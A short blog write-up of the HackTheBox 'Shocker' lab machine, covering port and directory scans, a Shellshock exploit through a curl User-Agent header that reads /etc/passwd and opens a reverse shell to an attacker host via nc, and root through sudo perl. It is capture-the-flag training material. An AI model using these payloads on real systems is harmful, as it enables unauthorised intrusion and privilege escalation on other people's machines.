HackTheBox: Shocker

ratiros01
3 min readMar 30, 2021
  1. Port scan
nmap -Pn 10.10.10.56nmap -Pn -p1000- 10.10.10.56

There’re 2 open ports: 80 and 2222.

2. OS and service scan

nmap -A -p80,2222 10.10.10.56

3. Vuln scan

nmap --script vuln -p80,2222 10.10.10.56

4. nikto

nikto -h http://10.10.10.56

5. gobuster and dirb

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/ -x php,txt,html,sh,cgi -q

While waiting for gobuster forever I decided to use dirb instead

dirb http://10.10.10.56/

Further directory enumeration, starting w/ cgi-bin

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x php,txt,html,sh,cgi -q

There’s user.sh

6. Access HTTP Site

Nothing more

7. HTTP Shellshock

Since I have user.sh in cgi-bin, let’s test for shellshock

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

Succeed. I can proceed to getting reverse shell

Prepare for listener

rlwrap nc -lvp 443

Get the reverse shell using these commands

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh

Back to the listener, I got the shell.

8. Privilege Escalation

Start w/ explore directory

cd /homels -lacd shellyls -la

I got user.txt

Another thing is .sudo_as_admin_successful

verify sudo

sudo -l

I can use perl.

Using guide from GTFOBins

sudo perl -e 'exec "/bin/sh";'
cd /rootls -la

--

--